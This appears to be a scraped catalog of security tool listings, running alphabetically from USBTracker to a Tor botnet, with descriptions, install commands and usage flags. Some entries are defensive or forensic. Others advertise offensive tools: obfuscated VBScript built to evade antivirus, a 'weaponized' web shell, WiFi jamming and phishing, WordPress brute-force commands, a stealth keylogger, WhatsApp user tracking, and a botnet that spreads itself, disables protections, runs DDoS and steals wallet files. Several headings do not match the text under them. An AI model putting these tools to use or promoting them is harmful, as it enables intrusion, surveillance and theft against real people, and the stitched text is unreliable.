USBTracker it's a free tool which allow you to extract some USB artifacts from a Windows OS (Vista and later).
You must execute USBTracker inside a CMD/Powershell console runnnig with administror privileges to be able to dump some log files artifacts.
USB related event(s) found in the event log :
=============================================
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
<System>
<Provider Name="Microsoft-Windows-DriverFrameworks-UserMode" Guid="2e35aaeb-857f-4beb-a418-2e6c0e54d988"></Provider>
<EventID Qualifiers="">1003</EventID>
<Version>1</Version>
<Level>4</Level>
<Task>17</Task>
<Opcode>1</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime="2015-01-18 20:31:34.013599"></TimeCreated>
<EventRecordID>2</EventRecordID>
<Correlation ActivityID="" RelatedActivityID=""></Correlation>
<Execution ProcessID="836" ThreadID="1488"></Execution>
<Channel>Microsoft-Windows-DriverFrameworks-UserMode/Operational</Channel>
<Computer>37L4247F27-25</Computer>
<Security UserID="S-1-5-18"></Security>
</System>
<UserData>
<UMDFDriverManagerHostCreateStart lifetime="8c076f4d-6405-4414-a829-ee44a94e3893" xmlns:auto-ns2="http://schemas.microsoft.com/win/2004/08/events" xmlns="http://www.microsoft.com/DriverFrameworks/UserMode/Event">
<HostGuid>{193a1820-d9ac-4997-8c55-be817523f6aa}</HostGuid>
<DeviceInstanceId>WPDBUSENUMROOT.UMB.2&37C186B&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#</DeviceInstanceId>
</UMDFDriverManagerHostCreateStart>
</UserData>
</Event>
...
usb\vid_0930&pid_6544\0019b931d970c8c0c5db00b9]
storage\volume\_??_usbstor#disk&ven_kingston&prod_datatraveler_2.0&rev_1.00#0019b931d970c8c0c5db00b9&0#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}]
WpdBusEnumRoot\UMB\2&37c186b&0&STORAGE#VOLUME#_??_USBSTOR#DISK&VEN_KINGSTON&PROD_DATATRAVELER_2.0&REV_1.00#0019B931D970C8C0C5DB00B9&0#]
usb\root_hub20\4&56dcbd&0]
usb\root_hub\4&38d808bf&0]
usb\root_hub\4&fee3d1d&0]
usb\root_hub20\4&3a831ac0&0]
usb\vid_0458&pid_0137\5&1d8fb94c&0&3]
usb\vid_05ac&pid_8242\5&1d8fb94c&0&5]
usb\vid_05ac&pid_8502\8t9a9e8d577k3l00]
...
Download USBTracker
USERPROFILESVIEW - VIEW USER PROFILES
INFORMATION ON YOUR WINDOWS
Version 1.10
Added 'Run As Administrator' option (Ctrl+F11)
Added 'Registry Loaded' column (Yes/No), which
specifies whether the Registry key of the user is
loaded into HKEY_USERS key.
Added 'Logon Time' column, which specifies the
logon time of the current logged on user.
UserProfilesView now displays the system users that
System Requirements
/stext <Filename>
/stab <Filename>
/scomma <Filename>
/stabular <Filename>
/shtml <Filename>
/sverhtml <Filename>
/sxml <Filename>
/sort <column>
/nosort
Download UserProfilesView
VANE - WORDPRESS VULNERABILITY SCANNER (A GPL
FORK OF WPSCAN)
Prerequisites
Windows not supported
Ruby >= 1.9
RubyGems
Git
Installing on Debian/Ubuntu
sudo apt-get install libcurl4-gnutls-dev libopenssl-ruby libxml2 libxml2-dev libxslt1-dev ruby-dev
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test development
Installing on Fedora
sudo yum install libcurl-devel
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test development
Installing on Archlinux
pacman -Sy ruby
pacman -Sy libyaml
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test development
gem install typhoeus
gem install nokogiri
Installing on Mac OS X
git clone https://github.com/delvelabs/vane.git
cd vane
sudo gem install bundler && bundle install --without test development
KNOWN ISSUES
VANE ARGUMENTS
--update  Update to the latest revision
--url | -u  The WordPress URL/domain to scan.
--force | -f  Forces WPScan to not check if the remote site is running WordPress.
--enumerate | -e [option(s)]  Enumeration. option : u usernames from id 1 to 10, u[10-20] usernames from id 10 to 20 (you must write the [] chars), p plugins, vp only vulnerable plugins, ap all plugins (can take a long time), tt timthumbs, t themes, vt only vulnerable themes, at all themes (can take a long time). Multiple values are allowed : '-e tt,p' will enumerate timthumbs and plugins. If no option is supplied, the default is 'vt,tt,u,vp'
--exclude-content-based ''  Used with the enumeration option, will exclude all occurrences based on the regexp or string supplied. You do not need to provide the regexp delimiters, but you must write the quotes (simple or double)
--config-file | -c  Use the specified config file
--follow-redirection  If the target url has a redirection, it will be followed without asking if you wanted to do so or not
--wp-content-dir  WPScan tries to find the content directory (i.e. wp-content) by scanning the index page, however you can specify it. Subdirectories are allowed
--wp-plugins-dir  Same thing as --wp-content-dir but for the plugins directory. If not supplied, WPScan will use wp-content-dir/plugins. Subdirectories are allowed
VANETOOLS ARGUMENTS
--help | -h
--verbose | -v  Verbose output.
--update | -u
Generate a new
VANETOOLS EXAMPLES
Generate a new 'most popular' plugin list, up to 150 pages ...
ruby vanetools.rb --generate_plugin_list 150
Download Vane
VBS-OBFUSCATOR - VBSCRIPT OBFUSCATION TO
ALLOW PENTESTERS BYPASS COUNTERMEASURES
Results (comparison)
First output
Dim SzVeVmXkoEZx, LALrsGQYjZtj, kLTOaGJfsmSG
SzVeVmXkoEZx = "6974-6865*602140/5236*45732/444*-8743+8841*8842-8731*5179-5059*-4646+4678*892-858*5573-5501*129-28*9855-9747*-6681+6789*-9095+9206*257184/8037*311721/3583*-7211+7322*741684/6506*-5620+5728*241300/2413*198-165*-9925+9959*6380-6336*5552-5520*-9222+9340*569-471*-6484+6563*6988-6881*128533/1627*-5150+5260*4828-4720*5616-5495*6062-6030*5407-5364*313728/9804*-9272+9390*-767+865*3735-3662*-2705+2815*-4151+4253*73704/664*-9531+9645*-7310+7419*-1882+1979*3171-3055*9554-9449*2676-2565*-1012+1122*107448/2442*4055-4023*-6753+6787*2058-1974*-5464+5568*428610/4082*2479-2364*-3013+3045*-9195+9300*128225/1115*56448/1764*-6899+6996*161760/5055*253752/2328*756288/7488*-4081+4196*29900/260*-3164+3261*-6830+6933*-6580+6681*-8764+8862*861360/7760*330840/2757*-2407+2441"
LALrsGQYjZtj = Split(SzVeVmXkoEZx, chr(eval(261366/6223)))
for each SKhxsIKQEybA in LALrsGQYjZtj
kLTOaGJfsmSG = kLTOaGJfsmSG & chr(eval(SKhxsIKQEybA))
next
execute(kLTOaGJfsmSG)
Second output
Dim wEQHvB, vsSBaV, pwgtko
wEQHvB = "-1912+2021*168-53*938948/9116*5796-5698*666666/6006*938-818*-4889+4921*-9635+9669*302112/4196*-9587+9688*-4950+5058*1012608/9376*-6763+6874*235232/7351*-8833+8920*412920/3720*1007190/8835*594432/5504*-5605+5705*1113-1080*9516-9482*347644/7901*181536/5673*198712/1684*615734/6283*779-700*6051-5944*-2574+2653*172370/1567*2086-1978*681472/5632*4765-4733*-2746+2789*54880/1715*2593-2475*733040/7480*-5259+5332*-7261+7371*103326/1013*-8585+8696*7371-7257*6640-6531*4564-4467*-6527+6643*62265/593*-1349+1460*2314-2204*-5438+5482*-5860+5892*4779-4745*1086-1002*-265+369*1276-1171*2588-2473*-2914+2946*101850/970*698050/6070*181760/5680*3610-3513*236896/7403*5004-4895*4565-4464*720245/6263*812360/7064*3582-3485*36977/359*4691-4590*482944/4928*-773+884*546720/4556*5235-5201"
vsSBaV = Split(wEQHvB, chr(eval(1039-997)))
for each KxRKRt in vsSBaV
pwgtko = pwgtko & chr(eval(KxRKRt))
next
execute(pwgtko)
Download VBS-Obfuscator
VBSCAN - A BLACK BOX VBULLETIN VULNERABILITY
SCANNER
Download VBScan
WAIDPS - WIRELESS AUDITING, INTRUSION DETECTION
& PREVENTION SYSTEM
Download WAIDPS
WAKEMEONLAN V1.71 - TURN ON COMPUTERS ON YOUR
NETWORK WITH WAKE-ON-LAN PACKET
computer:
On some computers, you may need to enable this
feature on the BIOS setup.
In the network card properties, you should go to the
'Power Management' and/or 'Advanced' tabs of the
network adapter, and turn on the Wake-on-LAN
feature.
Start Using WakeMeOnLan
After scanning your network for the first time, it's very easy to
turn on the computers you need. Simply run WakeMeOnLan,
select the desired computers, and then choose the 'Wake Up
Selected Computer' option (F8).
After using the 'Wake Up Selected Computer' option, you can
run another network scan to verify that the computers are
wakeupall command-line option. Like in the /wakeup command-line option, you can optionally specify broadcast address and
port number.
Examples:
WakeMeOnLan.exe /wakeupall
WakeMeOnLan.exe /wakeupall 20000 192.168.2.255
If you want to wake up all computers in a specific IP address range,
you can use the /wakeupiprange command-line option
Examples:
WakeMeOnLan.exe /wakeupiprange 192.168.0.25 192.168.0.100
WakeMeOnLan.exe /wakeupiprange 192.168.0.11 192.168.0.20 20000 192.168.0.255
Scan Your Network From Command-Line
/IPAddressFrom <IP Address>
/IPAddressTo <IP Address>
/UseIPAddressesRange <0 | 1>
/UseNetworkAdapter <0 | 1>
/UseNetworkAdapter <Name>
/MacAddressFormat <1 | 2 | 3>
/UseNetBios <0 | 1>
/cfg <Filename>
/stext <Filename>
/stab <Filename>
/scomma <Filename>
/stabular <Filename>
/shtml <Filename>
/sverhtml <Filename>
/sxml <Filename>
/sort <column>
/nosort
Download WakeMeOnLan v1.71
WALDO - MULTITHREADED DIRECTORY AND
SUBDOMAIN BRUTEFORCER
Setup
Download Waldo
WAP - WEB APPLICATION PROTECTION
Download WAP
WATCHER V1.5.8 - WEB SECURITY TESTING TOOL AND
PASSIVE VULNERABILITY SCANNER
more.
Download Watcher v1.5.8
WEB SECURITY DOJO - TRAINING ENVIRONMENT FOR
WEB APPLICATION SECURITY PENETRATION TESTING
Why?
The Web Security Dojo is for learning and practicing web app
security testing techniques. It is ideal for self-teaching and skill
assessment, as well as training classes and conferences, since
it does not need a network connection. The Dojo contains
everything needed to get started: tools, targets, and
documentation.
Feature Overview
Targets include:
OWASP's WebGoat
Google's Gruyere
Damn Vulnerable Web App
Hacme Casino
OWASP InsecureWebApp
w3af's test website
simple training targets by Maven Security (including REST
and JSON)
Tools: (starred = new this version)
Burp Suite (free version)
w3af
sqlmap
arachni *
metasploit
Zed Attack Proxy *
OWASP Skavenger
OWASP Dirbuster
Paros
Webscarab
Ratproxy
skipfish
websecurify
davtest
J-Baah
JBroFuzz
Watobo *
RATS
helpful Firefox add-ons
Requirements
Install BeautifulSoup
Platforms
Linux (any)
Mac (Not tested)
Windows (Not tested)
[!] If weeman runs on your platform (Mac/Windows), please let
me know.
Usage
Just type help
Run server:
The settings will be saved for the next time you run weeman.py.
Download Weeman
WEEVELY3 - WEAPONIZED WEB SHELL
The remote agent is a very low footprint php script that receives
dynamically injected code from the client, extending the client
functionalities over the network at run-time. The agent code is
polymorphic and hardly detectable by AV and HIDS. The
communication is covered and obfuscated within the HTTP
protocol using steganographic techniques.
Modules development
Linux
The following example runs on Debian/Ubuntu derived Linux
environments with Python version 2.7.
# Make sure that the python package manager and yaml libraries are installed
$ sudo apt-get install g++ python-pip libyaml-dev python-dev
# Install requirements
$ sudo pip install prettytable Mako PyYAML python-dateutil PySocks --upgrade
OS X
The following example runs on OS X with the Macports
packaging system.
$ sudo port install python27 py27-pip
$ sudo port select --set pip pip27
$ sudo port select --set python python27
# Ideally, at this point you should install the editline library (http://thrysoee.dk/editline/)
# to have working line completion in the terminal. See issue #7 for more info.
$ sudo pip install prettytable Mako PyYAML python-dateutil readline PySocks --upgrade
Windows
The following example runs on Microsoft Windows 7 with
Python version 2.7, and likely on other Windows versions. First
of all, install Python 2.7 and the pip package manager using
ez_setup.py as explained in this guide.
# Enter a folder which allows you to call pip.exe, usually C:\Python27\Scripts\ with no %PATH% set, and
# install the following requirements
Then, upload the generated agent under the target web folder.
Make sure that the agent PHP script is properly exposed and
executable through the web server.
Connect to the agent
Download Weevely3
WFUZZ - THE WEB APPLICATION BRUTEFORCER
Payloads
File
List
hexrand
range
names
hexrange
Encodings
random_uppercase
urlencode
binary_ascii
base64
double_nibble_hex
uri_hex
sha1
md5
double_urlencode
utf8
utf8_binary
html
html decimal
custom
many more...
Iterators
Product
Zip
Chain
Download Wfuzz
WHATSSPY - TRACE THE MOVES OF A WHATSAPP USER
Shortlist requirements:
Secondary Whatsapp account (phonenumber that doesn't
use Whatsapp)
Rooted Android phone OR Jailbroken iPhone OR PHP
knowledge
Server/RPi that runs 24/7
Nginx or Apache with PHP with PDO (php5-pgsql
installed) (you can't host on simple webhoster, you need
bash)
Postgresql
Notice
Once the tracker is started, you will not be able to receive any
messages over WhatsApp for this phone number. You can
either try to register a phone number not used with WhatsApp using,
for example, this script, or just buy a 5 euro SIM card and use
this phone number for the tracker.
For the tracker to work you need a secret which is retrieved
from either your phone or the register script mentioned above.
In case of phone registration you need a jailbroken iPhone or
rooted Android device in order to retrieve the secret.
Jailbroken iPhone users: You can retrieve it using this
script.
Rooted Android phones can use the following APK to
retrieve the secret.
In order to retrieve the secret you need to follow these steps:
Insert your (new) secondary SIM card in your phone and
boot it up.
Re-install WhatsApp on your phone and activate it using
the new phone number.
Use either the APK (Android) or the script (iPhone) to
retrieve the WhatsApp secret. Write this secret down,
which is required later.
Insert your normal SIM card and re-install WhatsApp for
normal use.
Download WhatsSpy
WHONIX V11 - ANONYMOUS OPERATING SYSTEM
build script: added fakeroot to whonix_build_script_build_dependency (required for verifiable builds)
genmkfile: if debuild not available, recommend installation of the devscripts package
genmkfile: fix, do not set automatically make_use_gain_root_command to true if fakeroot is not installed
genmkfile: run dpkg-checkbuilddeps before lintian to show better hint if build dependencies are missing
build script: build-steps.d/1200_create-debian-packages: commented out get_extra_packages, no longer need to download packages from testing
build script: refactoring, created separate help step, help-steps/git_sanity_test
whonixcheck: verbose output for check_tor_socks_port_reachability
all packages: packaging, bumped Standards-Version from 3.9.4 to 3.9.6 for jessie support
lintian warning copyright fix
tb-updater: show "highest version number is not necessarily the best one" message also on first run if no Tor Browser is installed yet https://phabricator.whonix.org/T283
build script: No longer install acpi-support-base by default on jessie, because systemd now implements that functionality. https://phabricator.whonix.org/T284
whonixcheck: added link to Whonix Build Version documentation https://www.whonix.org/wiki/Whonixcheck#Whonix_Build_Version https://phabricator.whonix.org/T276
build script: Fix commit 287bdcf6ddee007ba579e3ee9a1997edc8188581 makefile: added pedantic to default DEBUILD_LINTIAN_OPTS because we are going to fix the last remaining missing upstream changelog warning added pedantic help-steps/variables.
can now use StandardInput=tty and read instead of systemd-ask-password. Now we could even implement an interactive menu at boot (that allows to configure wait time and/or disabling rads). https://phabricator.whonix.org/T57
whonixcheck: abolished random wait by default https://phabricator.whonix.org/T299
anon-ws-disable-stacked-tor: fixed "insserv: script tor.anondist-orig: service tor already provided!" warning during upgrades https://phabricator.whonix.org/T303
anon-ws-disable-stacked-tor: systemd compatibility https://phabricator.whonix.org/T303
anon-base-files: no longer set -o pipefail in /usr/lib/pre.bsh. config-package-dev doesn't like set -o pipefail http://mailman.mit.edu/pipermail/config-package-dev/2015-May/000041.html https://phabricator.whonix.org/T329
upstream bug report: spaces in Tor's systemd unit file cause issues https://trac.torproject.org/projects/tor/ticket/16162
upstream bug report: Tor dies on reload when switching to DisableNetwork 0 when using DnsPort 127.0.0.1:53 https://trac.torproject.org/projects/tor/ticket/16161
build script: fix, support verifiable false (was verifiable minimal while build documentation said false)
uwt: multi user fix https://www.whonix.org/forum/index.php/topic,1267
Qubes: WiFi Realtek RTL8191SEvB Issue and Solution https://groups.google.com/forum/#!topic/qubes-users/kMGTSwP72aU
whonix-setup-wizard API proposal: https://www.whonix.org/wiki/Dev/whonixsetup
Download Whonix v11
WIFIINFOVIEW V1.79 - WIFI SCANNER FOR WINDOWS 7/8/
VISTA
detected.
Last Detection: The last date/time that this network was
detected.
Detection Count: The number of times that this network
was detected.
Command-Line Options
/cfg <Filename>
/NumberOfScans <Number>
/stext <Filename>
/stab <Filename>
/scomma <Filename>
/stabular <Filename>
/shtml <Filename>
/sverhtml <Filename>
/sxml <Filename>
/sort <column>
/nosort
/UseOnlyAdapter <0 | 1>
/NetworkAdapter <Adapter Guid>
/SortOnEveryUpdate <0 | 1>
/MacAddressFormat <1 - 3>
/DisplayMode <1 - 11>
/UpdateRate <1 - 4>
Download WifiInfoView v1.79
WIFIJAMMER - CONTINUOUSLY JAM ALL WIFI CLIENTS/
ROUTERS
Continuously jam all wifi clients and access points within range.
The effectiveness of this script is constrained by your wireless
card. Alfa cards seem to effectively jam within about a block
radius with heavy access point saturation. Granularity is given
in the options for more effective targeting.
Requires: python 2.7, python-scapy, a wireless card capable of
injection
Usage
Simple
python wifijammer.py
This will find the most powerful wireless interface and turn on
monitor mode. If a monitor mode interface is already up it will
use the first one it finds instead. It will then start sequentially
hopping channels 1 per second from channel 1 to 11 identifying
all access points and clients connected to those access points.
On the first pass through all the wireless channels it is only
identifying targets. After that the 1sec per channel time limit is
eliminated and channels are hopped as soon as the deauth
packets finish sending. Note that it will still add clients and APs
as it finds them after the first pass through.
Upon hopping to a new channel it will identify targets that are
on that channel and send 1 deauth packet to the client from the
AP, 1 deauth to the AP from the client, and 1 deauth to the AP
destined for the broadcast address to deauth all clients
connected to the AP. Many APs ignore deauths to broadcast
addresses.
python wifijammer.py -a 00:0E:DA:DE:24:8E -c 2
-c, Set the monitor mode interface to only listen and deauth
clients or APs on channel 1
-p, Send 5 packets to the client from the AP and 5 packets to
the AP from the client along with 5 packets to the broadcast
address of the AP
-t, Set a time interval of .00001 seconds between sending each
deauth (try this if you get a scapy error like 'no buffer space')
-s, Do not deauth the MAC DL:3D:8D:JJ:39:52. Ignoring a
certain MAC address is handy in case you want to tempt
Download WiFiJammer
WIFIPHISHER - FAST AUTOMATED PHISHING ATTACKS
AGAINST WIFI NETWORKS
Explanation
maximum
noupdate
timeinterval
packets
directedonly
accesspoint
jI jamminginterface
aI apinterface
Screenshots
A successful attack
Requirements
Kali Linux.
Two wireless network interfaces, one capable of injection.
Download WiFiPhisher
WIFRESTI - FIND YOUR WIRELESS NETWORK
PASSWORD FROM WINDOWS, LINUX AND MAC OS
Requirements
Installation
sudo su
git clone https://github.com/LionSec/wifresti.git && cp wifresti/wifresti.py /usr/bin/wifresti && chmod +x /usr/bin/wifresti
sudo wifresti
Download Wifresti
WIG - WEBAPP INFORMATION GATHERER
Requirements
Python 2.
How it works
example.com
optional arguments:
-h, --help
-l INPUT_FILE
-n STOP_AFTER
detected
-m
--no_cache_load
--no_cache_save
-N
no_cache_save
--verbosity, -v
localhost:8080)
-w OUTPUT_FILE
Example of run:
$ ./wig.py example.com
(wig ASCII-art banner)
TITLE                          IP
--- HTML TITLE ---             255.255.255.256

SOFTWARE                       VERSION               CATEGORY
Drupal                         7.32
ASP.NET                        4.0.30319.18067       Platform
Microsoft-HTTPAPI              2.0                   Platform
Microsoft-IIS                                        Platform
Microsoft Windows Server       2012                  Operating System

SOFTWARE                       VULNERABILITIES       LINK
Drupal 7.28                                          http://cvedetails.com/version/169265
Drupal 7.29                                          http://cvedetails.com/version/169917
Drupal 7.30                                          http://cvedetails.com/version/169916

URL                            NOTE                  CATEGORY
/login/                        Test directory        Interesting URL
/login/index_form.html                               Interesting URL
/robots.txt                    robots.txt index      Interesting URL
/test/                         Test directory        Interesting URL
_______________________________________________________________________________
Time: 15.7 sec
Urls: 351
Fingerprints: 28989
Download wig
WINDOWS SPY KEYLOGGER - SOFTWARE TO LOG
KEYSTROKES IN STEALTH MODE FOR 32-BIT/64-BIT
PROCESSES ON WINDOWS XP/VISTA/7/8/10
How to Use?
'Windows Spy Keylogger' is very easy to use tool with its cool
GUI interface.
Here are the simple steps,
Run 'Windows Spy Keylogger' on your system
It will show you the current status of Keylogger as seen in
the screenshots below.
Now you can just click on button below to Start or Stop
Keylogger
That's all :)
Also you can customize various options (run at startup, log
path, version check etc) using the 'Settings Dialog' by click on
the button at bottom right corner.
Background Scan
/cfg <Filename>
/stext <Filename>
/stab <Filename>
/scomma <Filename>
/stabular <Filename>
/shtml <Filename>
/sverhtml <Filename>
/sxml <Filename>
Background Scan
Command-Line Options
/cfg <Filename>
/stext <Filename>
/stab <Filename>
/scomma <Filename>
/stabular <Filename>
/shtml <Filename>
/sverhtml <Filename>
/sxml <Filename>
might notice that the scroll bar itself looks odd. It now features a
map of nearby packets, similar to the minimap available in
many modern text editors. The number of packets shown in the
map is the same as the number of physical vertical pixels in
your scrollbar. The more pixels you have, the more packets you
can see. In other words, if you use Wireshark regularly you now
have a legitimate business case for a retina display.
Statistics dialogs. The dialogs under the Statistics and
Telephony menus have seen many improvements. The
backend code has been consolidated so that most of
Wireshark's statistics now share common internal logic. This in
turn let us create common UI code with many workflow
improvements and a much more consistent interface.
I/O Graph dialog. You can now graph as many items as you
like and save graphs as PDF, PNG, JPEG, and BMP. Graph
settings stay with your profile so you can customize them for
multiple environments.
Follow Stream dialog. You can now switch between streams
and search for text.
General dialogs. Many dialogs now have context-aware hints.
For example the I/O Graph and Follow Stream dialogs will tell
you which packet corresponds to the graph or stream data
under your cursor. Most of them will stay open after you close a
capture file so that you can compare statistics or graphs
between captures.
Download Wireshark v2.0.0
WOODPECKER HASH BRUTEFORCE - MULTITHREADED
PROGRAM TO PERFORM A BRUTE-FORCE ATTACK
AGAINST A HASH
Wordpress Brute Force Multithreading with standard and xmlrpc login method written in python.
Features:
1. Multithreading
2. xml-rpc brute force mode
3. http and https protocols support
4. Random User Agent
5. Big wordlist support
Usage:
Standard login request:
python wordbrutepress.py -S -t http[s]://target.com[:port] -u username -w wordlist [--timeout in sec]
Xml-rpc login request:
python wordbrutepress.py -X -t http[s]://target.com[:port] -u username -w wordlist [--timeout in sec]
CHANGELOG
2015-11-20 v2.1
1) Add new feature: Big wordlist support (thanks to guly
@theguly)
2) Fix faultcode check instead of "403" code for XML-RPC
(thanks to guly @theguly)
2015-04-12 v2.0
1) Add new feature: xml-rpc brute force mode
2) Fix minor bugs
2015-04-11 v1.1
1) optparse (Deprecated since version 2.7) replaced by
argparse
2) Fix connection bugs
Download Wordbrutepress
WPHARDENING 1.5 - FORTIFY THE SECURITY OF ANY
WORDPRESS INSTALLATION
Usage
$ python wphardening.py -h
(WPHardening ASCII-art banner)
Fortify the security of any WordPress installation.
exit
-h, --help
-v, --verbose
results
--update
stable version
Target:
This option must be specified to modify the package
WordPress.
-d DIRECTORY, --dir=DIRECTORY
**REQUIRED** - Working Directory.
--load-conf=FILE
Hardening:
Different tools to hardening WordPress.
-c, --chmod
files.
-r, --remove
-b, --robots
-f, --fingerprinting
Deleted fingerprinting WordPress.
-t, --timthumb
--chown=user:group
owner.
--wp-config
--plugins
--proxy=PROXY
contents of directories.
--minify
and .js
--malware-scan
project.
Miscellaneous:
-o FILE, --output=FILE
Write log report to FILE.log
Examples
Change permissions
This option is to add the correct permissions to files and
directories.
$ python wphardening.py -d /home/path/to/wordpress --chmod -v
WPHardening update
With this option you can always have the latest version of
WPHardening.
$ python wphardening.py --update
Download WS-Attacker
XIAOPAN OS - PENTESTING DISTRIBUTION FOR
WIRELESS SECURITY ENTHUSIASTS
Alternatives
Download Xiaopan OS
XPL-SEARCH - SEARCH EXPLOITS IN MULTIPLE EXPLOIT
DATABASES
XPL SEARCH
Search exploits in multiple exploit databases!
Exploit databases available:
* Exploit-DB
* MIlw0rm
* PacketStormSecurity
* IntelligentExploit
* IEDB
* CVE
Lib                Enabled
cURL Version       7.40.0 or higher
allow_url_fopen    On
Permission
ABOUT DEVELOPER
Author_Nick    CoderPIRATA
Author_Name    Eduardo
coderpirata@gmail.com
Blog           http://coderpirata.blogspot.com.br/
https://twitter.com/coderpirata
Google+        https://plus.google.com/103146866540699363823
Pastebin       http://pastebin.com/u/CoderPirata
Github         https://github.com/coderpirata/
"CHANGELOG"
0.1 - [02/07/2015]
- Started.
0.2 - [12/07/2015]
- Added Exploit-DB.
- Added Colors, only for linux!
- Added Update Function.
- "Generator" of User-Agent reworked.
- Small errors and adaptations.
0.3 - [22/07/2015]
- Bugs solved.
- Added "save" Function.
- Added "set-db" function.
0.4 - [05/08/2015]
- Save function modified.
- Added Scan with list.
0.5 - [29/08/2015]
Screenshot
Download XPL-SEARCH
XPLICO V1.1.1 - OPEN SOURCE NETWORK FORENSIC
ANALYSIS TOOL (NFAT)
Download Xplico
XSSYA V2.0 - CROSS SITE SCRIPTING SCANNER &
VULNERABILITY CONFIRMATION
* Support HTTPS
* After Confirmation (execute payload to get cookies)
* Can be run in (Windows - Linux)
* Identify 3 types of WAF (Mod_Security - WebKnight - F5 BIG
IP)
Download XSSYA v2.0
YARGEN - A GENERATOR FOR YARA RULES (FOR
MALWARE RESEARCHERS)
Memory Requirements
Warning: yarGen pulls the whole goodstring database to
memory and uses up to 2 GB of memory for a few seconds.
-m M
-g G
-p prefix
-a author
Author Name
-r ref
Reference
-l min-size
(default=8)
-z min-score
(default=5)
-s max-size
(default=128)
-rc maxstrings
(default=20,
intelligent filtering will be
applied)
-nr
directories
-oe
(default=3)
--score
in the rules
--inverse
in the rules
--nodirname
in inverse rules
--noscorefilter
score (default in
'inverse' mode)
--excludegood
strings
--nosimple
condition statement
--nofilesize
condition statement
-fm FM
'filesize' condition
(default: 5)
--noglobal
--nosuper
Debug output
Best Practice
score. To see how a certain string in the rule scored, use the "--score" parameter.
python yarGen.py --score -m X:\MAL\Case1401
You can also instruct yarGen not to include the file path but
solely rely on the filename.
python yarGen.py --inverse -oe --nodirname -m G:\goodware\
Download yarGen
YASUO - SCANS FOR VULNERABLE & EXPLOITABLE
3RD-PARTY WEB APPLICATIONS
Details
Download YASUO
YAVOL - GUI FOR VOLATILITY FRAMEWORK AND YARA
This is just another GUI for volatility and yara which could make
someone's life easier. It is intended for incident responders for
quick examination of a memory image. Results are stored in an
sqlite db for reuse.
1. INSTALLATION
Clone repo
2. PREREQUISITES
You need to have Python (2.7), PyQt4, and sqlite3 installed.
Download YaVol
ZAP 2.4.2 - PENETRATION TESTING TOOL FOR TESTING
WEB APPLICATIONS
Bug fixes:
Issue 1760 : Unable to initialize home directory! xml/config.xml (No such file or directory)
Issue 1763 : Automatic check for updates fails to report new versions
Issue 1770 : Exceptions when calling (some) context API actions in daemon mode
Issue 1771 : For OSX the zap.sh in the core download hard-codes the relative java location
Issue 1772 : On OS X, Found Java version lies
Issue 1777 : "Cannot locate configuration source null.policy" after opening "Active Scan" dialogue
Issue 1781 : ZAP errors with "Unsupported option 'psn_x_xxxxxxx'" on OS X
Issue 1784 : NullPointerException when active scanning through the API with a target without scheme
Issue 1785 : Plugin enabled even if dependencies are not, "hangs" active scan
Issue 1787 : Context not used by the Spider even if selected
Issue 1788 : Scan Progress Pane Needs Sorting Change
Issue 1789 : Forced Browse/AJAX Spider messages not restored to Sites tab
Issue 1792 : Report not generated in daemon mode
Issue 1798 : Stop Attack Feature Locks up ZAP?
Issue 1804 : Disable processing of XML external entities by default
Issue 1805 : ZAP API might not return the response in requested format on errors
Issue 1858 : Spider might report wrong progress after finishing
Download ZAP 2.4.2
ZER0 - SECURED FILE DELETION MADE EASY
Features
Download Zer0
ZERONET - DECENTRALIZED WEBSITES USING BITCOIN CRYPTO AND BITTORRENT NETWORK
Why?
Features
How to join?
Windows
Debian
Mac
Install Homebrew
Vagrant
vagrant up
cd /vagrant
Run python zeronet.py --ui_ip 0.0.0.0
Docker
docker run -p 15441:15441 -p 43110:43110 nofish/zeronet
Download ZeroNet
ZIB - THE OPEN TOR BOTNET
Features
binaries.
Self spreading.
All bot files are SHA256 hash verified. Broken/corrupted
files get replaced.
Bypasses AntiVirus Deep-Scan.
Bot location varies, depending on administrative access.
IRC nickname format: Country[version]Windows version|CPU bits|User Privileges|CPU cores|random characters. Ex: US[v2]XP|x32|A|4c|F4L0s4kpN5. 64-bit detection may be having issues (shows up as 32-bit).
Disables various Windows functions WITHOUT giving the user warnings!
Disables Microsoft Windows error reporting, sending additional data, and error logging - System-wide as administrator, and on a per-user basis.
Disables User Access Control (UAC) - System-wide as administrator, and on a per-user basis.
Disables Windows Volume Shadow Copy Backup Service (vss) - System-wide as administrator.
Disables System Restore Service (srservice) - System-wide as administrator.
Disables System Restore - System-wide as administrator.
Melts on execution. Original file gets deleted. Should
delete the file out of the temporary folder, if used with a
binder.
Multi-threaded mass SSH scanner that saves servers on the bot's HDD encoded with base64, without duplicates or honeypots. Four integrated password lists of increasing difficulty [A,B,C,D], or brute force with min/max characters (supports numbers, upper/lowercase letters, symbols).
Cracked routers are used for UDP/TCP/HTTP/ICMP flooding. UDP flood requires having the routers download a Python script, and the majority of routers won't have Python. Has the ability to be used to take down DDoS-protected servers from scanning with just one bot. The Open Tor Botnet optionally will scan under Tor, multiple executed files, and update files. This means that you don't get the "Would you like to run this program?" dialog, and it runs completely hidden.
Detects all Windows operating systems from Windows 95,
ME, to 8. Will show Windows 10 as just Windows, or W8.
Text-To-Speech with speaker detection.
Duplicate nick-name handling, and ping-out handling.
Tor is downloaded directly from the Tor Project - It only
needs to be downloaded once, but still has persistence.
Grabs the bot IP address on startup, has the ability to
disable/enable bot command response, view status of ssh
scanner/omegle spreading/ddos/botkiller and start/stop
them.
Functionality to kill the bot instance, uninstall ZIB, grab full
OS info, check if a host on a certain port is online/offline
using TCP connect and a full HTTP request whilst
checking the reply for server status related information.
Check if a process is running, how many are running, and list directories. Use \ instead of C:\, e.g. !dir \, as some people run their main operating system on non-standard drive letters, especially on servers.
Upload specific files of your choosing that exist on a bot's
computer to your FTP server. Files that can be uploaded
could include BTC wallets.
Read files in plain-text off zombie computers. View
amount of scanned SSH servers. Kill processes. The bot
will tell you about missing command parameters, if a
certain parameter contains the wrong data-type, etc.
Errors from executing a command are output to the IRC channel without flooding the chat.
Commands are run multi-threaded and concurrently. This means your bots won't freeze up each time you run a command.
Download Zib-Trojan